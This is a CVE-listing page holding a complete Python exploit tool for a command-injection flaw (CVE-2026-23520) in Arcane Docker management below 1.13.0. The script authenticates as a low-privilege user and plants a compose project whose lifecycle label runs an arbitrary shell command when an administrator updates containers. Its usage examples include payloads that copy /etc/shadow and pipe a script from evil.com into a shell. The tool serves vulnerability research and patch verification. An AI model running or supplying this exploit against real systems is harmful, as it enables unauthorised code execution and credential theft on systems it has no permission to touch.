5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / poc.py PY
#!/usr/bin/env python3
"""
╔══════════════════════════════════════════════════════════════════════════╗
║              CVE-2026-23520 — Proof of Concept (PoC)                   ║
║         Arcane Docker Management — Lifecycle Label RCE                 ║
╠══════════════════════════════════════════════════════════════════════════╣
║  Product  : Arcane (Modern Docker Management)                          ║
║  Version  : < 1.13.0                                                   ║
║  Type     : OS Command Injection (CWE-78)                              ║
║  CVSS 3.1 : 9.0 (Critical) — AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H    ║
║  Advisory : GHSA-gjqq-6r35-w3r8                                       ║
║  Fix      : Upgrade to >= 1.13.0                                       ║
║  Author   : Security Research / Educational Use Only                   ║
╠══════════════════════════════════════════════════════════════════════════╣
║  DISCLAIMER: This tool is provided for AUTHORIZED security testing     ║
║  and educational purposes ONLY. Unauthorized access to computer        ║
║  systems is illegal. Use responsibly and only against systems you      ║
║  own or have explicit written permission to test.                      ║
╚══════════════════════════════════════════════════════════════════════════╝

VULNERABILITY SUMMARY
─────────────────────
Arcane's updater service supports Docker container lifecycle labels:
  • com.getarcaneapp.arcane.lifecycle.pre-update
  • com.getarcaneapp.arcane.lifecycle.post-update

The value of these labels is passed DIRECTLY to `/bin/sh -c` without
any sanitization or validation.

Any authenticated user (not limited to admins) can create a project
via the Arcane API with a docker-compose definition containing a
malicious lifecycle label. When an administrator later triggers a
container update, the injected command executes inside the container
(and potentially on the host if volume mounts are present).

ATTACK FLOW
───────────
  1. Attacker authenticates as a low-privilege user
  2. Attacker creates a project with a poisoned compose file
     containing a lifecycle label with an injected shell command
  3. An administrator triggers a container update (manual or scheduled)
  4. Arcane's updater reads the label and executes it via /bin/sh -c
  5. Arbitrary command execution is achieved
"""

import argparse
import json
import re
import sys
import textwrap
import time
import urllib.request
import urllib.error
import urllib.parse
import ssl

# ──────────────────────────────────────────────────────────────────────
# Configuration & Constants
# ──────────────────────────────────────────────────────────────────────

# Banner printed at the start of every sub-command.
BANNER = r"""
   ╔═══════════════════════════════════════════════════════╗
   ║          CVE-2026-23520  PoC Exploit                  ║
   ║    Arcane < 1.13.0 — Lifecycle Label RCE              ║
   ╚═══════════════════════════════════════════════════════╝
"""

# Container label names for the two lifecycle hooks; the --hook option
# ("pre" / "post") selects which one is written into the compose file.
LIFECYCLE_LABEL_PRE  = "com.getarcaneapp.arcane.lifecycle.pre-update"
LIFECYCLE_LABEL_POST = "com.getarcaneapp.arcane.lifecycle.post-update"

# CLI defaults for --port, --payload and --project-name.
DEFAULT_PORT    = 3552
DEFAULT_PAYLOAD = "id"  # Harmless proof command
PROJECT_NAME    = "poc-cve-2026-23520"

# Matches a string that *starts* with an optional "v" followed by X.Y.Z.
# Only the start is anchored, so suffixes such as "-rc1" are accepted.
SEMVER_RE = re.compile(r"^v?\d+\.\d+\.\d+")

# Candidate JSON keys that may carry the version string.  Matching is
# done case-insensitively at extraction time (see _extract_value); the
# canonical spellings are listed here.
VERSION_KEYS = [
    "currentVersion", "current_version",
    "version", "Version",
    "serverVersion", "server_version",
    "appVersion", "app_version",
    "release", "tag", "tag_name",
]

# Candidate paths for the version endpoint.  Tried in order; the first
# response that yields a version string wins.
# NOTE(review): these are guesses probed at runtime — which of them a
# given Arcane release actually serves is not established by this file.
VERSION_ENDPOINTS = [
    "/api/version",
    "/api/system/version",
    "/api/v1/version",
    "/api/settings/version",
    "/api/status",
    "/api/health",
    "/api/info",
]

# Candidate paths for the login endpoint, tried in order.
AUTH_ENDPOINTS = [
    "/api/auth/login",
    "/api/login",
    "/api/v1/auth/login",
    "/api/auth/signin",
    "/api/users/login",
]

# Candidate JSON keys that may carry the session token in a login
# response.
TOKEN_KEYS = [
    "token", "accessToken", "access_token",
    "jwt", "session", "sessionToken", "session_token",
    "bearer", "auth_token", "authToken",
]

# Candidate paths for listing environments, tried in order.
ENV_ENDPOINTS = [
    "/api/environments",
    "/api/v1/environments",
    "/api/endpoints",
    "/api/v1/endpoints",
]

# Candidate path templates for project creation, tried in order.
# {env_id} is filled in with str.format() at runtime; templates without
# the placeholder are used unchanged.
PROJECT_ENDPOINTS = [
    "/api/environments/{env_id}/projects",
    "/api/v1/environments/{env_id}/projects",
    "/api/projects",
    "/api/v1/projects",
    "/api/environments/{env_id}/compose",
    "/api/compose/projects",
]


# ──────────────────────────────────────────────────────────────────────
# Logging Helpers
# ──────────────────────────────────────────────────────────────────────

class Style:
    """ANSI SGR escape sequences used to colour terminal output."""

    # Bright foreground colours
    RED    = "\033[91m"
    GREEN  = "\033[92m"
    YELLOW = "\033[93m"
    CYAN   = "\033[96m"
    # Text attributes
    BOLD   = "\033[1m"
    DIM    = "\033[2m"
    # Resets every colour/attribute set above
    RESET  = "\033[0m"


def info(msg):
    """Print a neutral progress line tagged with a cyan ``[*]``."""
    line = f"  {Style.CYAN}[*]{Style.RESET} {msg}"
    print(line)


def success(msg):
    """Print a positive result line tagged with a green ``[+]``."""
    line = f"  {Style.GREEN}[+]{Style.RESET} {msg}"
    print(line)


def warning(msg):
    """Print a cautionary line tagged with a yellow ``[!]``."""
    line = f"  {Style.YELLOW}[!]{Style.RESET} {msg}"
    print(line)


def error(msg):
    """Print a failure line tagged with a red ``[-]`` (to stdout)."""
    line = f"  {Style.RED}[-]{Style.RESET} {msg}"
    print(line)


def debug(msg):
    """Print a dimmed ``[~]`` diagnostic line; the whole line is dimmed."""
    line = f"  {Style.DIM}[~] {msg}{Style.RESET}"
    print(line)


def section(title):
    """Print a bold cyan section heading preceded by a blank line."""
    heading = f"\n  {Style.BOLD}{Style.CYAN}── {title} ──{Style.RESET}"
    print(heading)


# ──────────────────────────────────────────────────────────────────────
# Response Helpers — extract values from unpredictable JSON shapes
# ──────────────────────────────────────────────────────────────────────

def _extract_value(data: dict, candidates: list) -> str | None:
    """Try each candidate key against `data`, case-insensitively.

    Also performs a one-level-deep nested search so structures like
    {"data": {"version": "1.12.0"}} are handled.
    """
    if not isinstance(data, dict):
        return None

    # Build a lowercase lookup of the response
    lower_map = {k.lower(): v for k, v in data.items()}

    for key in candidates:
        # Direct hit (exact case)
        val = data.get(key)
        if val and isinstance(val, str):
            return val
        # Case-insensitive hit
        val = lower_map.get(key.lower())
        if val and isinstance(val, str):
            return val

    # One-level-deep: check nested dicts
    for v in data.values():
        if isinstance(v, dict):
            nested_lower = {k.lower(): val for k, val in v.items()}
            for key in candidates:
                val = v.get(key)
                if val and isinstance(val, str):
                    return val
                val = nested_lower.get(key.lower())
                if val and isinstance(val, str):
                    return val

    return None


def _extract_list(data, candidates: list | None = None) -> list:
    """Return a list from the response, regardless of wrapper shape."""
    if isinstance(data, list):
        return data
    if isinstance(data, dict):
        # Try known keys first
        if candidates:
            for key in candidates:
                val = data.get(key)
                if isinstance(val, list):
                    return val
        # Fallback: return the first list-valued field
        for v in data.values():
            if isinstance(v, list):
                return v
    return []


def _scan_for_semver(data: dict, depth: int = 2) -> str | None:
    """Recursively scan a dict for any value matching vX.Y.Z."""
    for v in data.values():
        if isinstance(v, str) and SEMVER_RE.match(v):
            return v
        if isinstance(v, dict) and depth > 0:
            hit = _scan_for_semver(v, depth - 1)
            if hit:
                return hit
    return None


# ──────────────────────────────────────────────────────────────────────
# HTTP Client — resilient, quiet probing, adaptive parsing
# ──────────────────────────────────────────────────────────────────────

class ArcaneClient:
    """Minimal HTTP client for the Arcane REST API.

    Designed for resilience:
      • `quiet=True` suppresses error output (used during probing)
      • Multi-endpoint probing helpers try paths in order
      • Response parsing uses fuzzy key matching
    """

    def __init__(self, base_url: str, verify_ssl: bool = True,
                 verbose: bool = False):
        self.base_url = base_url.rstrip("/")
        self.token = None
        self.verbose = verbose
        self.ctx = ssl.create_default_context()
        if not verify_ssl:
            self.ctx.check_hostname = False
            self.ctx.verify_mode = ssl.CERT_NONE

    # ── low-level request ────────────────────────────────────────────

    def _request(self, method: str, path: str, data: dict = None,
                 quiet: bool = False) -> dict | None:
        """Send an HTTP request.  Returns parsed JSON or None on failure.

        When `quiet=True` errors are swallowed silently — this is used
        during endpoint probing so the user doesn't see 404 spam.
        """
        url = f"{self.base_url}{path}"
        headers = {"Content-Type": "application/json",
                   "Accept": "application/json"}
        if self.token:
            headers["Authorization"] = f"Bearer {self.token}"

        body = json.dumps(data).encode() if data else None
        req = urllib.request.Request(url, data=body, headers=headers,
                                    method=method)

        try:
            resp = urllib.request.urlopen(req, context=self.ctx, timeout=10)
        except urllib.error.HTTPError as exc:
            if not quiet:
                resp_body = exc.read().decode(errors="replace")
                error(f"HTTP {exc.code} — {exc.reason}")
                error(f"  Body: {resp_body[:500]}")
            return None
        except (urllib.error.URLError, OSError, TimeoutError) as exc:
            if not quiet:
                error(f"Connection failed: {exc}")
            return None

        raw = resp.read().decode(errors="replace")
        if not raw:
            return {}
        try:
            return json.loads(raw)
        except json.JSONDecodeError:
            return {"raw": raw}

    # ── convenience wrappers ─────────────────────────────────────────

    def get(self, path, **kw):
        return self._request("GET", path, **kw)

    def post(self, path, data=None, **kw):
        return self._request("POST", path, data=data, **kw)

    def put(self, path, data=None, **kw):
        return self._request("PUT", path, data=data, **kw)

    def delete(self, path, **kw):
        return self._request("DELETE", path, **kw)

    # ── version fingerprinting (resilient) ───────────────────────────

    def get_version(self) -> str | None:
        """Probe multiple endpoints and key names to find the version.

        Tries every combination of VERSION_ENDPOINTS × VERSION_KEYS
        and returns the first version string found.
        """
        info("Probing version endpoints …")
        for ep in VERSION_ENDPOINTS:
            if self.verbose:
                debug(f"Trying {ep}")

            resp = self.get(ep, quiet=True)
            if resp is None:
                continue

            if self.verbose:
                debug(f"Got response from {ep}: {json.dumps(resp)[:200]}")

            # Try all known key names (with case-insensitive + nested)
            ver = _extract_value(resp, VERSION_KEYS)
            if ver:
                success(f"Found version via {Style.DIM}{ep}{Style.RESET}")
                return ver

            # Last resort: scan every string value that looks like a
            # semver (vX.Y.Z or X.Y.Z)
            ver = _scan_for_semver(resp)
            if ver:
                success(f"Inferred version from {Style.DIM}{ep}{Style.RESET}")
                return ver

        return None

    # ── authentication (resilient) ───────────────────────────────────

    def login(self, username: str, password: str) -> bool:
        """Authenticate to Arcane by trying multiple auth endpoints
        and token key names."""
        info(f"Authenticating as {Style.BOLD}{username}{Style.RESET} …")

        creds_variants = [
            {"username": username, "password": password},
            {"email": username, "password": password},
            {"Username": username, "Password": password},
            {"user": username, "pass": password},
        ]

        for ep in AUTH_ENDPOINTS:
            for creds in creds_variants:
                if self.verbose:
                    debug(f"Trying {ep} with keys {list(creds.keys())}")

                resp = self.post(ep, data=creds, quiet=True)
                if resp is None:
                    continue

                if self.verbose:
                    # Redact the actual token value in debug output
                    debug(f"Got response from {ep}: keys={list(resp.keys())}")

                # Try known token keys
                tok = _extract_value(resp, TOKEN_KEYS)
                if tok and len(tok) > 20:
                    self.token = tok
                    success(f"JWT obtained via {Style.DIM}{ep}{Style.RESET}")
                    return True

                # Heuristic: any long string value with dots might be a JWT
                for val in resp.values():
                    if isinstance(val, str) and len(val) > 40 and "." in val:
                        self.token = val
                        success(f"JWT obtained via {Style.DIM}{ep}{Style.RESET} "
                                f"(heuristic)")
                        return True

        error("Authentication failed on all known endpoints")
        return False

    # ── environment discovery (resilient) ────────────────────────────

    def get_environments(self) -> list:
        """List available environments by probing multiple paths."""
        info("Probing environment endpoints …")
        for ep in ENV_ENDPOINTS:
            if self.verbose:
                debug(f"Trying {ep}")

            resp = self.get(ep, quiet=True)
            if resp is None:
                continue

            envs = _extract_list(resp, [
                "environments", "Environments",
                "endpoints", "Endpoints",
                "data", "results", "items",
            ])
            if envs:
                success(f"Found {len(envs)} environment(s) via "
                        f"{Style.DIM}{ep}{Style.RESET}")
                return envs

            # If the response itself is a dict with an "id", treat it
            # as a single-environment response
            if isinstance(resp, dict) and ("id" in resp or "Id" in resp):
                return [resp]

        return []

    # ── project creation (resilient) ─────────────────────────────────

    def create_poisoned_project(self, env_id: str, project_name: str,
                                payload: str,
                                hook: str = "pre") -> dict | None:
        """Create a new project with a poisoned lifecycle label.

        Tries multiple API path patterns and compose field names.
        """
        label_key = (LIFECYCLE_LABEL_PRE if hook == "pre"
                     else LIFECYCLE_LABEL_POST)

        compose_content = textwrap.dedent(f"""\
            services:
              {project_name}:
                image: alpine:latest
                container_name: {project_name}
                restart: unless-stopped
                command: ["sleep", "infinity"]
                labels:
                  - "{label_key}={payload}"
        """)

        info(f"Injecting payload into lifecycle label: "
             f"{Style.BOLD}{hook}-update{Style.RESET}")
        info(f"Label : {Style.DIM}{label_key}{Style.RESET}")
        info(f"Value : {Style.RED}{payload}{Style.RESET}")

        # Build a list of request bodies with different field names
        # that various Arcane versions might expect
        body_variants = [
            {"name": project_name, "composeContent": compose_content},
            {"name": project_name, "compose_content": compose_content},
            {"name": project_name, "content": compose_content},
            {"name": project_name, "compose": compose_content},
            {"Name": project_name, "ComposeContent": compose_content},
            {"projectName": project_name, "composeFile": compose_content},
        ]

        # Build the endpoint list, filling in env_id
        endpoints = [ep.format(env_id=env_id) for ep in PROJECT_ENDPOINTS]

        for ep in endpoints:
            for body in body_variants:
                if self.verbose:
                    debug(f"Trying POST {ep} with keys {list(body.keys())}")

                resp = self.post(ep, data=body, quiet=True)
                if resp is None:
                    continue
                # Any non-None response that isn't an explicit error
                if isinstance(resp, dict) and resp.get("error"):
                    if self.verbose:
                        debug(f"Error response: {resp.get('error')}")
                    continue
                success(f"Project created via "
                        f"{Style.DIM}{ep}{Style.RESET}")
                return resp

        error("Failed to create project on all known endpoints")
        return None


# ──────────────────────────────────────────────────────────────────────
# Version Parsing Utility
# ──────────────────────────────────────────────────────────────────────

def parse_version(version_str: str) -> tuple | None:
    """Parse 'v1.12.4' or '1.12.4' into (1, 12, 4).  Returns None on
    failure."""
    m = re.match(r"v?(\d+)\.(\d+)\.(\d+)", version_str)
    if m:
        return int(m.group(1)), int(m.group(2)), int(m.group(3))
    return None


def is_vulnerable(version_str: str) -> bool | None:
    """Classify a version string against the 1.13.0 fix release.

    Returns True for anything below 1.13, False for 1.13 and later, and
    None when the string cannot be parsed.
    """
    components = parse_version(version_str)
    if components is None:
        return None
    # The patch number cannot change the answer: the boundary is x.13.0,
    # so comparing (major, minor) is sufficient.
    return components[:2] < (1, 13)


# ──────────────────────────────────────────────────────────────────────
# Main Exploit Logic
# ──────────────────────────────────────────────────────────────────────

def run_exploit(args):
    """Run the `exploit` sub-command end to end.

    Steps, in order:
      1. Fingerprint the target version (informational only — the run
         continues whatever the result)
      2. Authenticate; exits with status 1 on failure
      3. Pick an environment: --env-id if given, otherwise the first
         one discovered; exits with status 1 if none is found
      4. Create the project carrying the lifecycle label; exits with
         status 1 on failure

    `args` is the argparse namespace produced by build_parser() for the
    `exploit` sub-command.
    """
    print(BANNER)
    base_url = f"{args.scheme}://{args.target}:{args.port}"

    client = ArcaneClient(base_url, verify_ssl=(not args.no_verify),
                          verbose=args.verbose)

    # ── Step 1: Fingerprint ──────────────────────────────────────────
    section("Step 1 · Fingerprinting Target")
    info(f"Target: {base_url}")
    version = client.get_version()
    if version:
        success(f"Arcane version: {Style.BOLD}{version}{Style.RESET}")
        vuln = is_vulnerable(version)
        if vuln is True:
            success(f"Version {version} is < 1.13.0 — "
                    f"{Style.RED}VULNERABLE{Style.RESET}")
        elif vuln is False:
            warning(f"Version {version} is >= 1.13.0 — PATCHED")
            warning("Exploit will likely fail. Continue? (Ctrl-C to abort)")
            # Not an interactive prompt: just a 3-second window in which
            # the operator can press Ctrl-C before the run continues.
            time.sleep(3)
        else:
            warning(f"Could not parse version string: {version}")
    else:
        warning("Could not determine version (continuing anyway)")

    # ── Step 2: Authenticate ─────────────────────────────────────────
    section("Step 2 · Authentication")
    if not client.login(args.username, args.password):
        error("Cannot proceed without authentication. Exiting.")
        sys.exit(1)

    # ── Step 3: Discover environment ─────────────────────────────────
    section("Step 3 · Environment Discovery")
    env_id = args.env_id

    if not env_id:
        envs = client.get_environments()
        if not envs:
            error("No environments found. Specify one with --env-id.")
            sys.exit(1)
        # List everything that was found before choosing one.
        for e in envs:
            eid = (_extract_value(e, ["id", "Id", "ID", "uuid", "UUID"])
                   or "?")
            ename = (_extract_value(e, ["name", "Name", "label", "Label"])
                     or "unknown")
            info(f"  → {eid}  ({ename})")
        # The first environment is used.
        # NOTE(review): _extract_value only returns non-empty strings, so
        # a numeric id is shown as "?" above and falls back to "1" here.
        first = envs[0]
        env_id = str(
            _extract_value(first, ["id", "Id", "ID", "uuid", "UUID"])
            or "1"
        )
        success(f"Using environment: {Style.BOLD}{env_id}{Style.RESET}")
    else:
        info(f"Using provided environment ID: {env_id}")

    # ── Step 4: Plant poisoned project ───────────────────────────────
    section("Step 4 · Planting Poisoned Project")
    result = client.create_poisoned_project(
        env_id=env_id,
        project_name=args.project_name,
        payload=args.payload,
        hook=args.hook,
    )

    # NOTE(review): an empty response body is returned as {} by the
    # client, which is falsy and therefore reported as a failure here.
    if result:
        section("Exploit Planted Successfully")
        success("The poisoned project is now waiting for an update trigger.")
        print()
        info("When an administrator triggers a container update (manual")
        info("or scheduled), the payload will execute inside the container")
        info("via /bin/sh -c with the value of the lifecycle label.")
        print()
        warning("If the container has host volume mounts, the payload")
        warning("may be able to read/write the host filesystem.")
        print()

        # Summary box
        print(f"  {Style.DIM}{'─' * 56}{Style.RESET}")
        print(f"  {Style.BOLD}Payload{Style.RESET}: {Style.RED}{args.payload}{Style.RESET}")
        print(f"  {Style.BOLD}Hook   {Style.RESET}: {args.hook}-update")
        print(f"  {Style.BOLD}Project{Style.RESET}: {args.project_name}")
        print(f"  {Style.DIM}{'─' * 56}{Style.RESET}")
    else:
        error("Exploit deployment failed.")
        sys.exit(1)


# ──────────────────────────────────────────────────────────────────────
# Compose-File Generator (standalone / offline mode)
# ──────────────────────────────────────────────────────────────────────

def generate_compose(args):
    """Run the `generate` sub-command: print a compose file to stdout.

    Performs no network I/O.  `args` must provide `hook`, `project_name`
    and `payload`; the latter two are interpolated verbatim into the
    YAML text (no escaping is applied).
    """
    print(BANNER)
    section("Generating Poisoned Compose File")

    # "pre" selects the pre-update label; anything else the post-update
    # one (argparse restricts --hook to "pre"/"post").
    label_key = (LIFECYCLE_LABEL_PRE if args.hook == "pre"
                 else LIFECYCLE_LABEL_POST)

    # The f-string is interpolated first and dedented afterwards.
    compose = textwrap.dedent(f"""\
        # ─────────────────────────────────────────────────────────
        # CVE-2026-23520 — Poisoned docker-compose.yml
        # Arcane < 1.13.0 Lifecycle Label Command Injection
        # ─────────────────────────────────────────────────────────
        # Import this file as a new project in Arcane.
        # When a container update is triggered, the payload fires.
        # ─────────────────────────────────────────────────────────

        services:
          {args.project_name}:
            image: alpine:latest
            container_name: {args.project_name}
            restart: unless-stopped
            command: ["sleep", "infinity"]
            labels:
              - "{label_key}={args.payload}"
    """)

    print(compose)
    success("Copy the above YAML into Arcane's 'Create Project' form.")
    info("When an update is triggered, the label value will execute as:")
    info(f"  /bin/sh -c '{args.payload}'")


# ──────────────────────────────────────────────────────────────────────
# Version Check Mode
# ──────────────────────────────────────────────────────────────────────

def check_version(args):
    """Run the `check` sub-command: report whether the target is affected.

    Only the unauthenticated version probe is performed; nothing is
    modified on the target.  `args` must provide `scheme`, `target`,
    `port`, `no_verify` and `verbose`.
    """
    print(BANNER)
    target_url = f"{args.scheme}://{args.target}:{args.port}"
    client = ArcaneClient(target_url, verify_ssl=(not args.no_verify),
                          verbose=args.verbose)

    section("Version Check")
    info(f"Target: {target_url}")

    detected = client.get_version()
    if not detected:
        # No verdict possible: say so rather than implying "safe".
        warning("Could not determine version. Target may still be vulnerable.")
        warning("Ensure the host and port are correct and the service is up.")
        return

    success(f"Arcane version: {Style.BOLD}{detected}{Style.RESET}")

    verdict = is_vulnerable(detected)
    if verdict is True:
        error(f"VULNERABLE — version {detected} < 1.13.0")
        return
    if verdict is False:
        success("PATCHED — not vulnerable to CVE-2026-23520")
        return
    warning(f"Could not parse version: {detected}")


# ──────────────────────────────────────────────────────────────────────
# CLI Argument Parser
# ──────────────────────────────────────────────────────────────────────

def build_parser() -> argparse.ArgumentParser:
    """Build the command-line parser with its three sub-commands.

    Sub-commands: ``exploit``, ``check`` and ``generate``; the chosen
    one is stored in ``args.command`` and is mandatory.

    ``-v/--verbose`` is accepted both before and after the sub-command
    name.  Options defined only on the top-level parser are rejected
    when they follow the sub-command, which made the epilog's own
    ``check -t 10.0.0.5 --verbose`` example fail.  The sub-command copy
    uses ``default=argparse.SUPPRESS`` so that, when the flag is absent
    there, it does not overwrite a ``-v`` given before the sub-command.
    """
    parser = argparse.ArgumentParser(
        description="CVE-2026-23520 — Arcane Lifecycle Label RCE PoC",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog=textwrap.dedent("""\
        Examples
        ────────
          # Full exploit against a target
          %(prog)s exploit -t 192.168.1.10 -u attacker -p s3cret

          # Just check if the target is vulnerable
          %(prog)s check -t 192.168.1.10

          # Generate a poisoned compose file (offline)
          %(prog)s generate --payload "cat /etc/shadow > /tmp/loot"

          # Use post-update hook with custom payload
          %(prog)s exploit -t 10.0.0.5 -u user -p pass \\
              --hook post --payload "curl http://evil.com/shell.sh | sh"

          # Verbose probing to see which endpoints are tried
          %(prog)s check -t 10.0.0.5 --verbose
        """),
    )

    # Global flags
    parser.add_argument("-v", "--verbose", action="store_true",
        help="Show probing debug output")

    # Same flag for use *after* the sub-command name.  SUPPRESS keeps
    # the attribute out of the sub-parser's namespace unless the flag is
    # actually given, so the top-level value is never clobbered.
    common = argparse.ArgumentParser(add_help=False)
    common.add_argument("-v", "--verbose", action="store_true",
        default=argparse.SUPPRESS,
        help="Show probing debug output")

    subparsers = parser.add_subparsers(dest="command", required=True)

    # ── exploit sub-command ───────────────────────────────────────────
    sp_exploit = subparsers.add_parser("exploit", parents=[common],
        help="Deploy the poisoned project via the Arcane API")
    sp_exploit.add_argument("-t", "--target", required=True,
        help="Arcane host (IP or hostname)")
    sp_exploit.add_argument("-P", "--port", type=int, default=DEFAULT_PORT,
        help=f"Arcane port (default: {DEFAULT_PORT})")
    sp_exploit.add_argument("-u", "--username", required=True,
        help="Arcane username (any authenticated user)")
    sp_exploit.add_argument("-p", "--password", required=True,
        help="Arcane password")
    sp_exploit.add_argument("--payload", default=DEFAULT_PAYLOAD,
        help=f"Command to inject (default: '{DEFAULT_PAYLOAD}')")
    sp_exploit.add_argument("--hook", choices=["pre", "post"], default="pre",
        help="Which lifecycle hook to poison (default: pre)")
    sp_exploit.add_argument("--project-name", default=PROJECT_NAME,
        help=f"Name for the poisoned project (default: {PROJECT_NAME})")
    sp_exploit.add_argument("--env-id",
        help="Environment ID (auto-detected if omitted)")
    sp_exploit.add_argument("--scheme", choices=["http", "https"],
        default="http", help="URL scheme (default: http)")
    sp_exploit.add_argument("--no-verify", action="store_true",
        help="Disable TLS certificate verification")

    # ── check sub-command ─────────────────────────────────────────────
    sp_check = subparsers.add_parser("check", parents=[common],
        help="Fingerprint Arcane and check if vulnerable")
    sp_check.add_argument("-t", "--target", required=True,
        help="Arcane host")
    sp_check.add_argument("-P", "--port", type=int, default=DEFAULT_PORT)
    sp_check.add_argument("--scheme", choices=["http", "https"],
        default="http")
    sp_check.add_argument("--no-verify", action="store_true")

    # ── generate sub-command ──────────────────────────────────────────
    sp_gen = subparsers.add_parser("generate", parents=[common],
        help="Generate a poisoned compose file (no network required)")
    sp_gen.add_argument("--payload", default=DEFAULT_PAYLOAD,
        help=f"Command to inject (default: '{DEFAULT_PAYLOAD}')")
    sp_gen.add_argument("--hook", choices=["pre", "post"], default="pre")
    sp_gen.add_argument("--project-name", default=PROJECT_NAME)

    return parser


# ──────────────────────────────────────────────────────────────────────
# Entry Point
# ──────────────────────────────────────────────────────────────────────

def main():
    """Parse the command line and dispatch to the chosen sub-command.

    Exit codes: 130 when interrupted with Ctrl-C, 1 on any unhandled
    exception (sub-commands may also exit with 1 themselves).
    """
    args = build_parser().parse_args()

    # Defensive fallback so handlers can always read args.verbose.
    if not hasattr(args, "verbose"):
        args.verbose = False

    handlers = {
        "exploit": run_exploit,
        "check": check_version,
        "generate": generate_compose,
    }

    try:
        handler = handlers.get(args.command)
        if handler is not None:
            handler(args)
    except KeyboardInterrupt:
        print(f"\n  {Style.YELLOW}[!]{Style.RESET} Aborted by user.")
        sys.exit(130)
    except Exception as exc:
        # Top-level boundary: report and exit instead of a traceback.
        error(f"Unhandled error: {exc}")
        sys.exit(1)


if __name__ == "__main__":
    main()